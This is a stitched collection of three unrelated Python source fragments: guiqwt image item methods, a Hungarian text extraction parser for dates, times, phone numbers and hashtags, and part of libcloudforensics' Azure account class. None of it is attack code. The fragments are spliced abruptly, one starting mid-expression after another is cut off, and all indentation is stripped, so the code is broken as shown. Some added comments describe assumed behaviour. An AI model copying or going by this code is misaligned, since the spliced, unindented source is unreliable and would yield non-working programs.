"""Set item resizable state
(or any action triggered when moving an handle, e.g. rotation)"""
self._can_resize = state
def set_movable(self, state):
"""Set item movable state"""
self._can_move = state
def set_rotatable(self, state):
"""Set item rotatable state"""
self._can_rotate = state
def can_select(self):
return self._can_select
def can_resize(self):
return self._can_resize
def can_move(self):
return self._can_move
def can_rotate(self):
return self._can_rotate
def hit_test(self, pos):
plot = self.plot()
ax = self.xAxis()
ay = self.yAxis()
return self.border_rect.poly_hit_test(plot, ax, ay, pos)
def update_item_parameters(self):
pass
def get_item_parameters(self, itemparams):
itemparams.add("ShapeParam", self, self.border_rect.shapeparam)
def set_item_parameters(self, itemparams):
self.border_rect.set_item_parameters(itemparams)
def move_local_point_to(self, handle, pos, ctrl=None):
"""Move a handle as returned by hit_test to the new position pos
ctrl: True if <Ctrl> button is being pressed, False otherwise"""
pass
def move_local_shape(self, old_pos, new_pos):
"""Translate the shape such that old_pos becomes new_pos
in canvas coordinates"""
pass
def move_with_selection(self, delta_x, delta_y):
"""
Translate the shape together with other selected items
delta_x, delta_y: translation in plot coordinates
"""
pass
# ---- IBaseImageItem API --------------------------------------------------
def can_setfullscale(self):
return True
def can_sethistogram(self):
return False
def get_histogram(self, nbins):
"""interface de IHistDataSource"""
if self.data is None:
return [0,], [0, 1]
if self.histogram_cache is None or nbins != self.histogram_cache[0].shape[0]:
# from guidata.utils import tic, toc
if True:
# tic("histo1")
res = np.histogram(self.data, nbins)
# toc("histo1")
else:
# TODO: _histogram is faster, but caching is buggy
# in this version
# tic("histo2")
_min = _nanmin(self.data)
_max = _nanmax(self.data)
if self.data.dtype in (np.float64, np.float32):
bins = np.unique(
np.array(
np.linspace(_min, _max, nbins + 1), dtype=self.data.dtype
)
)
else:
bins = np.arange(_min, _max + 2, dtype=self.data.dtype)
res2 = np.zeros((bins.size + 1,), np.uint32)
_histogram(self.data.flatten(), bins, res2)
# toc("histo2")
res = res2[1:-1], bins
self.histogram_cache = res
else:
res = self.histogram_cache
return res
def __process_cross_section(self, ydata, apply_lut):
if apply_lut:
a, b, bg, cmap = self.lut
return (ydata * a + b).clip(0, LUT_MAX)
else:
return ydata
def get_stats(self, x0, y0, x1, y1):
"""Return formatted string with stats on image rectangular area
(output should be compatible with AnnotatedShape.get_infos)"""
ix0, iy0, ix1, iy1 = self.get_closest_index_rect(x0, y0, x1, y1)
data = self.data[iy0:iy1, ix0:ix1]
xfmt = self.imageparam.xformat
yfmt = self.imageparam.yformat
zfmt = self.imageparam.zformat
return "<br>".join(
[
"<b>%s</b>" % self.imageparam.label,
"%sx%s %s"
% (self.data.shape[1], self.data.shape[0], str(self.data.dtype)),
"",
"%s ≤ x ≤ %s" % (xfmt % x0, xfmt % x1),
"%s ≤ y ≤ %s" % (yfmt % y0, yfmt % y1),
"%s ≤ z ≤ %s" % (zfmt % data.min(), zfmt % data.max()),
"‹z› = " + zfmt % data.mean(),
"σ(z) = " + zfmt % data.std(),
]
)
def get_xsection(self, y0, apply_lut=False):
"""Return cross section along x-axis at y=y0"""
_ix, iy = self.get_closest_indexes(0, y0)
return (
self.get_x_values(0, self.data.shape[1]),
self.__process_cross_section(self.data[iy, :], apply_lut),
)
def get_ysection(self, x0, apply_lut=False):
"""Return cross section along y-axis at x=x0"""
ix, _iy = self.get_closest_indexes(x0, 0)
return (
self.get_y_values(0, self.data.shape[0]),
self.__process_cross_section(self.data[:, ix], apply_lut),
)
def get_average_xsection(self, x0, y0, x1, y1, apply_lut=False):
"""Return average cross section along x-axis"""
ix0, iy0, ix1, iy1 = self.get_closest_index_rect(x0, y0, x1, y1)
ydata = self.data[iy0:iy1, ix0:ix1].mean(axis=0)
return (
self.get_x_values(ix0, ix1),
self.__process_cross_section(ydata, apply_lut),
)
def get_average_ysection(self, x0, y0, x1, y1, apply_lut=False):
"""Return average cross section along y-axis"""
ix0, iy0, ix1, iy1 = self.get_closest_index_rect(x0, y0, x1, y1)
ydata = self.data[iy0:iy1, ix0:ix1].mean(axis=1)
return (
self.get_y_values(iy0, iy1),
self.__process_cross_section(ydata, apply_lut),
)
assert_interfaces_valid(BaseImageItem)
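# Illustration of the affine LUT transform installed by set_lut_range() above:
# a data value v maps to a * v + b, clipped to [0, LUT_MAX] before the colormap
# lookup, so the chosen (min, max) range spans the whole lookup table. The
# helper below is a sketch added for clarity and is not part of guiqwt.
def _lut_range_example(vmin=10.0, vmax=60.0):
    """Return LUT indices for a few sample values (illustrative only)."""
    a = LUT_MAX / (vmax - vmin)              # same formula as set_lut_range()
    b = -LUT_MAX * vmin / (vmax - vmin)
    values = np.array([0.0, 10.0, 35.0, 60.0, 80.0])
    # 10.0 maps to 0, 60.0 maps to LUT_MAX, values outside the range are clipped
    return (values * a + b).clip(0, LUT_MAX)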
# ==============================================================================
# Raw Image item (image item without scale)
# ==============================================================================
class RawImageItem(BaseImageItem):
"""
Construct a simple image item
* data: 2D NumPy array
* param (optional): image parameters
(:py:class:`guiqwt.styles.RawImageParam` instance)
"""
__implements__ = (
IBasePlotItem,
IBaseImageItem,
IHistDataSource,
IVoiImageItemType,
ISerializableType,
)
# ---- BaseImageItem API ---------------------------------------------------
def get_default_param(self):
"""Return instance of the default imageparam DataSet"""
return RawImageParam(_("Image"))
# ---- Serialization methods -----------------------------------------------
def __reduce__(self):
fname = self.get_filename()
if fname is None:
fn_or_data = self.data
else:
fn_or_data = fname
state = self.imageparam, self.get_lut_range(), fn_or_data, self.z()
res = (self.__class__, (), state)
return res
def __setstate__(self, state):
param, lut_range, fn_or_data, z = state
self.imageparam = param
if is_text_string(fn_or_data):
self.set_filename(fn_or_data)
self.load_data()
elif fn_or_data is not None: # should happen only with previous API
self.set_data(fn_or_data)
self.set_lut_range(lut_range)
self.setZ(z)
self.imageparam.update_image(self)
def serialize(self, writer):
"""Serialize object to HDF5 writer"""
fname = self.get_filename()
load_from_fname = fname is not None
+ 'stem']) + r')' + boundary, None, text)
if stem_matches:
if len(matches) <= len(stem_matches):
return (False, 0)
return (True, (len(matches) - len(stem_matches)) * item[select + 'score'])
return (True, len(matches) * item[select + 'score'])
if delete:
return text
return (False, 0)
# Extract Class
class Extract:
##### CONSTRUCTOR #####
def __init__(self, text=''):
if not isinstance(text, str):
raise ValueError('Constructor only accepts strings.')
elif text:
self.text = text
self.ntext = self._convert_numbers(self.text)
self._text_ = ' ' + self.text + ' ' # some complex regular expressions were easier to write for padded text
self._ntext_ = ' ' + self.ntext + ' ' # some complex regular expressions were easier to write for padded text
##### DATA MODEL #####
def __repr__(self):
return "<Lara Extract Parser instance at {0}>".format(hex(id(self)))
def __str__(self):
return self.text
def __len__(self):
return len(self.text)
def __eq__(self, other):
if self.__class__.__name__ == other.__class__.__name__:
return (self.text == other.text)
elif isinstance(other, bool):
return (len(self.text) != 0) == other
elif isinstance(other, str):
return self.text == other
return False
def __ne__(self, other):
return not self.__eq__(other)
def __add__(self, other):
if other:
if self.__class__.__name__ == other.__class__.__name__:
self.text += other.text
elif isinstance(other, str):
self.text += other
self._text_ = ' ' + self.text + ' '
self.ntext = self._convert_numbers(self.text)
self._ntext_ = ' ' + self.ntext + ' '
return self
return self
##### CLASS FUNCTIONS #####
# extract list of #hashtags from text
def hashtags(self, normalize=True):
if self.text:
matches = _re.findall(r'#([\w\d]+(?:[\w\d_\-\']+[\w\d]+)+)\b', None, self.text)
if normalize:
return ['#{0}'.format(hashtag.lower()) for hashtag in matches]
else:
return ['#{0}'.format(hashtag) for hashtag in matches]
return []
# extract list of @hashtags from text
def mentions(self):
if self.text:
return _re.findall(r'(?<![\w\d\_])(\@[\w\d_]+(?:[\w\d_\-\'\.]+[\w\d_]+)+)\b', None, self._text_)
return []
# extract list of http://urls/ from text
def urls(self):
if self.text:
return _re.findall(
r'\b((?:https?\:[\/\\]{2}(?:w{3}\.)?|(?:w{3}\.))(?:[\w\d_\-]+\.\w{2,})(?:[\/\\](?:[\w\d\-_]+[\/\\]?)*)?(?:\?[^\s]*)?(?:\#[^\s]+)?)',
re.IGNORECASE, self.text)
return []
# extract list of smileys :) from text
def smileys(self):
if self.text:
return _re.findall(r'(?:[\:\;\=]\-*[DdXxCc\|\[\]\(\)3]+[89]*)|(?:[\(\)D\[\]\|]+\-*[\:\;\=])', None,
self.text)
return []
# extract digits with n places
def digits(self, n=0, normalize=True, convert=True):
results = []
if self.text:
matches = _re.findall(r'((?:\d[\-\.\,\s]?)+)', re.IGNORECASE, self.ntext if convert else self.text)
for item in matches:
original = item
item = lara.nlp.trim(''.join(e for e in item if e.isdigit()))
if n <= 0 or len(item) == n:
if normalize:
results.append(item)
else:
results.append(original.strip())
return results
# extract (decimal) numbers
def numbers(self, decimals=True, convert=True):
if self.text:
if decimals:
matches = _re.findall(
r'(?<!\d)(?<!\-)(?<!\:)((?:\-\s?)?(?:(?:\d\s?)+(?:[\.\,]\d+[^\.\,])?|(?:[\.\,]\d+[^\.\,\:]))[\-\:]?)',
re.IGNORECASE, self._ntext_ if convert else self._text_)
okay = []
for item in matches:
if item[-1] not in ('-', ':'):
item = item.replace(',', '.')
if not item[-1].isnumeric():
item = item[:-1]
if item[0] == '-':
if item[1] == '.':
item = '-0' + item[1:]
elif not item[0].isnumeric():
item = item[1:]
item = ''.join([char for char in item if char != ' '])
try:
correct = float(item)
okay.append(correct)
except:
pass
return okay
else:
matches = _re.findall(r'(?<!\d\-)(?<![\.\,\d])(\-?(?:\d\s?)+(?![\.\,]\d))[^\d\-\:]+', re.IGNORECASE,
self._ntext_ if convert else self._text_)
okay = [item for item in matches if item and item[-1] not in ('-', ':')]
return [int(''.join(number.strip().split())) for number in okay]
return []
# extract percentages
def percentages(self, normalize=True):
if self.text:
if normalize:
matches = _re.findall(r'((?:\d+(?:[\,\.]\d+)?|[\,\.]\d+))\s?(?:\%|sz[aá]zal[eé]k)', re.IGNORECASE,
self.text)
results = []
for item in matches:
item = item.replace(',', '.')
if item.startswith('.'):
item = '0' + item
if '.' in item:
places = len(item.split('.')[1]) + 2
else:
places = 2
item = str("{:." + str(places) + "f}").format(float(item) / 100.00)
results.append(float(item))
return results
else:
return _re.findall(r'((?:\d+(?:[\,\.]\d+)?|[\,\.]\d+)\s?(?:\%|sz[aá]zal[eé]k))', re.IGNORECASE,
self.text)
return []
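# Example behaviour assumed from the regex and normalization above:
# Extract('A boltban 25%-os, majd 7,5 százalék kedvezmény volt.').percentages()
# would return [0.25, 0.075]; with normalize=False the raw matches
# ['25%', '7,5 százalék'] are returned instead.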
# extract phone numbers
def phone_numbers(self, normalize=True, convert=True):
results = []
if self.text:
matches = _re.findall(
r'((?:\(?(?:\+36|0036|06)[\s\-\\\/]?)?\(?\d{1,2}\)?[\s\-\\\/]?\d(?:\d[\s\-\\\/]?){5}\d)', re.IGNORECASE,
self.ntext if convert else self.text)
if not normalize:
return matches
for item in matches:
item = lara.nlp.trim(''.join(e for e in item if e.isdigit()))
if item.startswith('36') or item.startswith('06'):
item = item[2:]
elif item.startswith('0036'):
item = item[4:]
if len(item) == 8:
item = item[0] + ' ' + item[1:]
else:
item = item[0:2] + ' ' + item[2:]
results.append('+36 ' + item)
return results
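# Example behaviour assumed from the normalization above: a text containing
# "06 30 123 4567" or "+36 (30) 123-4567" would both yield '+36 30 1234567';
# with normalize=False the raw matched substrings are returned.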
# extract list of common Hungarian date formats from text without further processing them
def dates(self, normalize=True, convert=True, current=False):
results = []
if self.text:
if current:
now = datetime.datetime.strptime(current, "%Y-%m-%d")
else:
now = datetime.datetime.now()
matches = _re.findall(
r'((\d{2})?(\d{2}([\\\/\.\-]\s?|\s))([eé]v\s?)?(\d{1,2}([\\\/\.\-]\s?|\s)(h[oó](nap)?\s?)?)?(\d{1,2}))\W*([aáeéio][ikn]|nap)?\b',
re.IGNORECASE, self.text)
for item in matches:
match = re.sub('([eé]v|h[oó]|nap)', '', item[0])
parts = list(filter(None, re.split(r'\W', match + '-')))
if len(parts) == 3:
if int(parts[1]) <= 12:
if normalize:
if len(parts[0]) == 4:
results.append(parts[0] + '-' + parts[1].zfill(2) + '-' + parts[2].zfill(2))
else:
results.append('20' + parts[0] + '-' + parts[1].zfill(2) + '-' + parts[2].zfill(2))
else:
results.append(item[0])
elif len(parts) == 2:
if normalize:
if len(parts[0]) == 4:
results.append(parts[0] + '-' + parts[1].zfill(2) + '-??')
elif int(parts[0]) > 12:
results.append('20' + parts[0] + '-' + parts[1].zfill(2) + '-??')
else:
results.append(str(now.year) + '-' + parts[0].zfill(2) + '-' + parts[1].zfill(2))
else:
results.append(item[0])
matches = _re.findall(
r'\b((\d{2}(\d{2})?\W{1,2})?((jan|feb|m[aá]r|[aá]pr|m[aá]j|j[uú][nl]|aug|sz?ep|okt|nov|dec)\w{0,10}\W{1,2}|[ivx]{1,4}\W{0,2})(h[aoó][nv]?\w{0,7}\W{1,2})?(\d{1,2})?\W?\w*)\b',
re.IGNORECASE, self.ntext if convert else self.text)
for item in matches:
match = item[0].lower()
year = ''
day = ''
switch = False
for char in match:
if switch:
if char.isdigit():
day += char
else:
if char.isdigit():
year += char
else:
switch = True
if not year and not day:
continue
if not year:
year = str(now.year)
elif len(year) == 2:
year = '20' + year
if not day:
day = '??'
elif len(day) == 1:
day = '0' + day
month = ''
if 'jan' in match:
month = '01'
elif 'feb' in match:
month = '02'
elif 'mar' in match or 'már' in match:
month = '03'
elif 'apr' in match or 'ápr' in match:
month = '04'
elif 'maj' in match or 'máj' in match:
month = '05'
elif 'jun' in match or 'jún' in match:
month = '06'
elif 'jul' in match or 'júl' in match:
month = '07'
elif 'aug' in match:
month = '08'
elif 'sep' in match or 'szep' in match:
month = '09'
elif 'okt' in match:
month = '10'
elif 'nov' in match:
month = '11'
elif 'dec' in match:
month = '12'
else:
roman = ''
for char in match:
if char in ('i', 'v', 'x'):
roman += char
elif roman and char.isnumeric():
break
elif roman and char.isalpha():
roman = ''
break
if not roman:
continue
if 'v' in roman:
if roman.startswith('v'):
month = str(4 + len(roman)).zfill(2)
else:
month = str(6 - len(roman)).zfill(2)
elif 'x' in roman:
if roman.startswith('x'):
month = str(9 + len(roman)).zfill(2)
else:
month = str(11 - len(roman)).zfill(2)
else:
month = str(len(roman)).zfill(2)
if month and month != '00' and len(day) <= 2:
if normalize:
results.append(year + '-' + month + '-' + day)
else:
results.append(item[0])
if not results:
matches = _re.findall(r'\b(?<!\-)([0123]?\d)[\.\-aáeéint]+(?![kloópr])', re.IGNORECASE,
self.ntext if convert else self.text)
for item in matches:
if int(item) <= 31:
if normalize:
year = str(now.year)
month = str(now.month).zfill(2)
day = item.zfill(2)
results.append(year + '-' + month + '-' + day)
else:
results.append(item)
return results
# extract times like 12:00 or délután 4
def times(self, normalize=True, convert=True, current=False):
if self.text:
matches = _re.findall(
r'\b((?:ma\s?|holnap(?:\s?ut[aá]n)?\s?|tegnap(?:\s?el[oöő]t+)?\s?)?(?:reggel\s?|hajnal(?:i|ban)?\s?|d[eé]lel[oöő]t+\s?|d\.?e\.?\s?|d[eé]lut[aá]n\s?|d\.?u\.?\s?|este\s?|[eé]j+el\s?)?\,?\s?(?:[12345]?\d\s?perc+el\s)?(?:(?:h[aá]rom)?negyed\s?|f[eé]l\s?)?(?:[012]?\d|d[eé]l\w*|[eé]jf[eé]l\w*)\s?(?:\:\s?|k[oö]z[oö]t+|\-?kor\s?|\-?t[oóöő]l|\-?ig?|\-?r[ae]|[oó]r[aá]\w{0,3}\s?)?(?:el[oöő]t+\s?|ut[aá]n\s?)?(?:[0123456]?\d[\-\s]?(?![cmntvz][ae]l)(?:kor|t[oóöő]l|ig?|r[ae]|perc\w{0,3})?(?:\s?(?:(?:h[aá]rom)?negyed\s?|f[eé]l\s?)?([012]?\d(?:\sel[ooöő]t+|ut[aá]n)?))?)?\,?\s?(?:ma\s?|holnap(?:\s?ut[aá]n)?\s?|tegnap(?:\s?el[oöő]t+)?\s?)?(?:(1)(?:reggel\s?|hajnal(?:i|ban)?\s?|d[eé]lel[oöő]t+\s?|d\.?e\.?\s?|d[eé]lut[aá]n\s?|d\.?u\.?\s?|este\s?|[eé]j+el\s?))?)',
re.IGNORECASE, self._ntext_ if convert else self._text_)
results = []
if normalize:
last_pm = None
for _item in matches:
item = _item[0]
if len(item.strip()) > 2:
item = ' ' + item.lower() + ' '
hour = "00"
minute = "00"
pm = last_pm
zero = False
elott = False
del_matches = _re.findall(r'd[eé]l\w*|[eé]jf[eé]l\w*', re.IGNORECASE, item)
hour_matches = _re.findall(
r'\D([012]?\d(?!\d))\D*?(?!perc)(?:\:\s?|k[oö]z[oö]t+|\-?kor|\-?t[oóöő]l|\-?ig?|\-?r[ae]|[oó]r[aá]\w*)?',
re.IGNORECASE, item)
minute_matches = _re.findall(
r'(?!negyed|f[eé]l)\D([0123456]?\d(?!\d))\D*?(?![oó]r[aá])(?:\-?kor|\-?t[oóöő]l|\-?ig?|\-?r[ae]|perc\w*)?',
re.IGNORECASE, item)
quarter_matches = _re.findall(r'((?:h[aá]rom)?negyed|f[eé]l)', re.IGNORECASE, item)
am_matches = _re.findall(r'(reggel|hajnal|d[eé]lel[oöő]t|d\.?e\.?)', re.IGNORECASE, item)
pm_matches = _re.findall(r'(d[eé]lut[aá]n|d\.?u\.?|este|[eé]j+el)', re.IGNORECASE, item)
if len(hour_matches) in (1, 2):
if len(hour_matches) == 1:
if len(minute_matches) == 1:
hour = (hour_matches[0])
minute = "00"
elif len(minute_matches) == 2:
if (hour_matches[0]) == (minute_matches[0]):
hour = (hour_matches[0])
minute = (minute_matches[1])
else:
hour = (hour_matches[0])
minute = (minute_matches[0])
else:
if len(minute_matches) == 2:
if (hour_matches[0]) == (minute_matches[1]):
hour = (hour_matches[0])
minute = (minute_matches[0])
else:
hour = (hour_matches[0])
minute = (minute_matches[1])
elif len(minute_matches) == 1:
if (hour_matches[0]) == (minute_matches[0]):
hour = (hour_matches[1])
minute = "00"
else:
hour = (hour_matches[0])
minute = (minute_matches[0])
else:
hour = (hour_matches[0])
if len(hour_matches) == 2:
minute = (hour_matches[1])
if hour[0] == '0':
zero = True
hour = int(hour)
minute = int(minute)
if hour > 24 and minute < 24:
minute, hour = hour, minute
if minute > 60:
minute = 0
if _re.findall(r'(el[oöő]t+)', re.IGNORECASE, item):
if minute:
if not _re.findall(r'(el[oöő]t+.+?perc)', re.IGNORECASE, item):
hour, minute = minute, hour
elott = True
hour -= 1
minute = 60 - minute
if _re.findall(r'(perccel.+?ut[aá]n+)', re.IGNORECASE, item):
hour, minute = minute, hour
hour = hour
if quarter_matches:
if quarter_matches[0] in ('fel', 'fél'):
if not elott:
hour -= 1
minute += 30
elif quarter_matches[0] in ('haromnegyed', 'háromnegyed'):
if not elott:
hour -= 1
minute += 45
elif quarter_matches[0] in ('negyed'):
if not elott:
hour -= 1
minute += 15
if not zero:
if pm_matches:
pm = True
elif not am_matches:
if current is not False:
now = current
else:
now = datetime.datetime.now().hour
if 'holnap' in item and hour < 9:
pm = True
elif hour < 12 and now > hour and last_pm is not False:
pm = True
else:
pm = False
if pm and hour <= 12:
hour += 12
hour %= 24
minute %= 60
last_pm = pm
results.append(str(hour).zfill(2) + ':' + str(minute).zfill(2))
elif del_matches:
if 'jf' in item:
results.append('00:00')
else:
results.append('12:00')
else:
for item in matches:
item = item[0].strip()
ok = False
for char in item:
if not char.isnumeric():
ok = True
if item and ok:
results.append(item)
return results
return []
# extract list of time durations
def durations(self, normalize=True, convert=True):
if self.text:
matches = _re.findall(
r'\b((?:(?:(?:\d\s?)+(?:[\.\,]\d+)?\s(?:(?:[eé]s\s)?(?:f[eé]l|(?:h[aá]rom)?negyed)\s)?(?:(?:(?:t[ií]zed|sz[aá]zad|ezred)?m[aá]sod)?perc\w{0,3}|[oó]r[aá]\w{0,3}|nap\w{0,3}|7\w{0,3}|h[eé]t\w{0,3}|h[oó]nap\w{0,3}|[eé]v\w{0,3})(?:\s(?:m[uú]lva|r[aá]|(?:ez)?el[oöő]t+|el[oöő]b+|k[eé]s[oö]b+|bel[uü]l|h[aá]tr(?:a|[eé]bb)|vissza|el[oöő]re))?)(?:\W{1,2}(?:[eé]s|meg)?\W*)?)+)',
re.IGNORECASE, self.ntext if convert else self.text)
if normalize:
results = []
now = datetime.datetime.now()
for item in matches:
sub_matches = _re.findall(
r'\b((?:(?:\d\s?)+(?:[\.\,]\d+)?\s(?:(?:[eé]s\s)?(?:f[eé]l|(?:h[aá]rom)?negyed)\s)?(?:(?:(?:t[ií]zed|sz[aá]zad|ezred)?m[aá]sod)?perc\w{0,3}|[oó]r[aá]\w{0,3}|nap\w{0,3}|7|h[eé]t\w{0,3}|h[oó]nap\w{0,3}|[eé]v\w{0,3})(?:\s(?:m[uú]lva|r[aá]|(?:ez)?el[oöő]t+|el[oöő]b+|k[eé]s[oö]b+|bel[uü]l|h[aá]tr(?:a|[eé]bb)|vissza|el[oöő]re))?))',
re.IGNORECASE, item)
val = 0
for sub_item in sub_matches:
match = sub_item.lower().replace(',', '.')
sval = ''
for char in match:
if char.isdigit() or char == '.':
sval += char
else:
break
sval = float(sval)
mpx = 1
if 'tized' in match or 'tízed' in match:
mpx = 0.1
elif 'szazad' in match or 'század' in match:
mpx = 0.01
elif 'ezred' in match:
mpx = 0.001
elif 'masod' in match or 'másod' in match:
mpx = 1
elif 'perc' in match:
mpx = 60
elif 'or' in match or 'ór' in match:
mpx = 3600
elif 'ho' in match or 'hó' in match:
if now.month in (1, 3, 5, 7, 8, 10, 12):
mpx = 86400 * 31
elif now.month == 2:
if now.year % 4 == 0 and (now.year % 100 != 0 or now.year % 400 == 0):  # leap year
mpx = 86400 * 29
else:
mpx = 86400 * 28
else:
mpx = 86400 * 30
elif 'nap' in match:
mpx = 86400
elif 'het' in match or 'hét' in match or '7' in match:
mpx = 604800
elif 'ev' in match or 'év' in match:
if now.year % 400 == 0
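# ---------------------------------------------------------------------------
# The Extract listing above is truncated at this point. A small usage sketch
# follows (illustrative only; the sample sentence and the expected values are
# assumptions based on the regexes above, not on the original test suite):
# ---------------------------------------------------------------------------
sample = Extract('Találkozzunk holnap délután 4-kor! #meeting @kovacs.anna http://example.com/terv')
print(sample.hashtags())  # expected: ['#meeting']
print(sample.mentions())  # expected: ['@kovacs.anna']
print(sample.urls())      # expected: ['http://example.com/terv']
print(sample.times())     # expected: something like ['16:00'] (normalized HH:MM)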
# Source repository: GreenStorm-Code/cloud-forensics-utils, file: libcloudforensics/providers/azure/internal/account.py
# -*- coding: utf-8 -*-
# Copyright 2020 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Represents an Azure account."""
import base64
import hashlib
from time import sleep
from typing import Optional, Dict, Tuple, List, Any
# Pylint complains about the import but the library imports just fine,
# so we can ignore the warning.
# pylint: disable=import-error
import sshpubkeys
from azure.core import exceptions
from azure.mgmt import compute as azure_compute
from azure.mgmt import resource, storage, network
from azure.mgmt.compute.v2020_05_01 import models
from azure.storage import blob
from msrestazure import azure_exceptions
# pylint: enable=import-error
from libcloudforensics.providers.azure.internal import compute, common
from libcloudforensics import logging_utils
from libcloudforensics.scripts import utils
logging_utils.SetUpLogger(__name__)
logger = logging_utils.GetLogger(__name__)
class AZAccount:
"""Class that represents an Azure Account.
Attributes:
subscription_id (str): The Azure subscription ID to use.
credentials (ServicePrincipalCredentials): An Azure credentials object.
compute_client (ComputeManagementClient): An Azure compute client object.
"""
def __init__(self,
default_resource_group_name: str,
default_region: str = 'eastus',
profile_name: Optional[str] = None) -> None:
"""Initialize the AZAccount class.
Args:
default_resource_group_name (str): The default resource group in which to
create new resources. If the resource group does not exist,
it will be created automatically.
default_region (str): Optional. The default region to create new
resources in. Default is eastus.
profile_name (str): Optional. The name of the profile to use for Azure
operations. For more information on profiles, see GetCredentials()
in libcloudforensics.providers.azure.internal.common.py. Default
does not use profiles and will authenticate to Azure using
environment variables.
"""
self.subscription_id, self.credentials = common.GetCredentials(profile_name)
self.default_region = default_region
self.compute_client = azure_compute.ComputeManagementClient(
self.credentials, self.subscription_id)
self.storage_client = storage.StorageManagementClient(
self.credentials, self.subscription_id)
self.resource_client = resource.ResourceManagementClient(
self.credentials, self.subscription_id)
self.network_client = network.NetworkManagementClient(
self.credentials, self.subscription_id)
self.default_resource_group_name = self._GetOrCreateResourceGroup(
default_resource_group_name)
def ListSubscriptionIDs(self) -> List[str]:
"""List subscription ids from an Azure account.
Returns:
List[str]: A list of all subscription IDs from the Azure account.
"""
subscription_client = resource.SubscriptionClient(self.credentials)
subscription_ids = subscription_client.subscriptions.list()
return [sub.subscription_id for sub in subscription_ids]
def ListInstances(self,
resource_group_name: Optional[str] = None
) -> Dict[str, compute.AZVirtualMachine]:
"""List instances in an Azure subscription / resource group.
Args:
resource_group_name (str): Optional. The resource group name to list
instances from. If none specified, then all instances in the Azure
subscription will be listed.
Returns:
Dict[str, AZVirtualMachine]: Dictionary mapping instance names (str) to
their respective AZVirtualMachine object.
"""
instances = {} # type: Dict[str, compute.AZVirtualMachine]
az_vm_client = self.compute_client.virtual_machines
if not resource_group_name:
responses = common.ExecuteRequest(az_vm_client, 'list_all')
else:
responses = common.ExecuteRequest(
az_vm_client,
'list',
{'resource_group_name': resource_group_name})
for response in responses:
for instance in response:
instances[instance.name] = compute.AZVirtualMachine(
self,
instance.id,
instance.name,
instance.location,
zones=instance.zones)
return instances
def ListDisks(
self,
resource_group_name: Optional[str] = None) -> Dict[str, compute.AZDisk]:
"""List disks in an Azure subscription / resource group.
Args:
resource_group_name (str): Optional. The resource group name to list
disks from. If none specified, then all disks in the AZ
subscription will be listed.
Returns:
Dict[str, AZDisk]: Dictionary mapping disk names (str) to their
respective AZDisk object.
"""
disks = {} # type: Dict[str, compute.AZDisk]
az_disk_client = self.compute_client.disks
if not resource_group_name:
responses = common.ExecuteRequest(az_disk_client, 'list')
else:
responses = common.ExecuteRequest(
az_disk_client,
'list_by_resource_group',
{'resource_group_name': resource_group_name})
for response in responses:
for disk in response:
disks[disk.name] = compute.AZDisk(self,
disk.id,
disk.name,
disk.location,
zones=disk.zones)
return disks
def GetInstance(
self,
instance_name: str,
resource_group_name: Optional[str] = None) -> compute.AZVirtualMachine:
"""Get instance from AZ subscription / resource group.
Args:
instance_name (str): The instance name.
resource_group_name (str): Optional. The resource group name in which to
look for the instance. If none is specified, the instance will be
fetched from the Azure subscription.
Returns:
AZVirtualMachine: An Azure virtual machine object.
Raises:
RuntimeError: If the instance was not found in the subscription / resource
group.
"""
instances = self.ListInstances(resource_group_name=resource_group_name)
if instance_name not in instances:
error_msg = 'Instance {0:s} was not found in subscription {1:s}'.format(
instance_name, self.subscription_id)
raise RuntimeError(error_msg)
return instances[instance_name]
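# Hedged usage sketch (names are illustrative, not from the original source):
# listing and fetching compute resources through the account object.
#
#   vms = az.ListInstances(resource_group_name='forensics-rg')
#   vm = az.GetInstance('suspect-vm')  # raises RuntimeError if not found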
def GetDisk(
self,
disk_name: str,
resource_group_name: Optional[str] = None) -> compute.AZDisk:
"""Get disk from AZ subscription / resource group.
Args:
disk_name (str): The disk name.
resource_group_name (str): Optional. The resource group name in which to
look for the disk. If none is specified, the disk will be fetched
from the Azure subscription.
Returns:
AZDisk: An Azure Compute Disk object.
Raises:
RuntimeError: If the disk was not found in the subscription / resource
group.
"""
disks = self.ListDisks(resource_group_name=resource_group_name)
if disk_name not in disks:
error_msg = 'Disk {0:s} was not found in subscription {1:s}'.format(
disk_name, self.subscription_id)
raise RuntimeError(error_msg)
return disks[disk_name]
def CreateDiskFromSnapshot(
self,
snapshot: compute.AZSnapshot,
region: Optional[str] = None,
disk_name: Optional[str] = None,
disk_name_prefix: Optional[str] = None,
disk_type: str = 'Standard_LRS') -> compute.AZDisk:
"""Create a new disk based on a Snapshot.
Args:
snapshot (AZSnapshot): Snapshot to use.
region (str): Optional. The region in which to create the disk. If not
provided, the disk will be created in the default_region associated with
the AZAccount object.
disk_name (str): Optional. String to use as new disk name.
disk_name_prefix (str): Optional. String to prefix the disk name with.
disk_type (str): Optional. The sku name for the disk to create. Can be
Standard_LRS, Premium_LRS, StandardSSD_LRS, or UltraSSD_LRS. The
default value is Standard_LRS.
Returns:
AZDisk: Azure Compute Disk.
Raises:
RuntimeError: If the disk could not be created.
"""
if not disk_name:
disk_name = common.GenerateDiskName(snapshot,
disk_name_prefix=disk_name_prefix)
if not region:
region = self.default_region
creation_data = {
'location': region,
'creation_data': {
'sourceResourceId': snapshot.resource_id,
'create_option': models.DiskCreateOption.copy
},
'sku': {'name': disk_type}
}
try:
logger.info('Creating disk: {0:s}'.format(disk_name))
request = self.compute_client.disks.create_or_update(
self.default_resource_group_name,
disk_name,
creation_data)
while not request.done():
sleep(5) # Wait 5 seconds before checking disk status again
disk = request.result()
logger.info('Disk {0:s} successfully created'.format(disk_name))
except azure_exceptions.CloudError as exception:
raise RuntimeError('Could not create disk from snapshot {0:s}: {1:s}'
.format(snapshot.resource_id, str(exception)))
return compute.AZDisk(self,
disk.id,
disk.name,
disk.location,
disk.zones)
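# Illustrative call (the snapshot object and prefix are assumed names): copy an
# evidence snapshot into a new Standard SSD disk in the account's default region.
#
#   disk_copy = az.CreateDiskFromSnapshot(
#       snapshot, disk_name_prefix='evidence', disk_type='StandardSSD_LRS')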
def CreateDiskFromSnapshotURI(
self,
snapshot: compute.AZSnapshot,
snapshot_uri: str,
region: Optional[str] = None,
disk_name: Optional[str] = None,
disk_name_prefix: Optional[str] = None,
disk_type: str = 'Standard_LRS') -> compute.AZDisk:
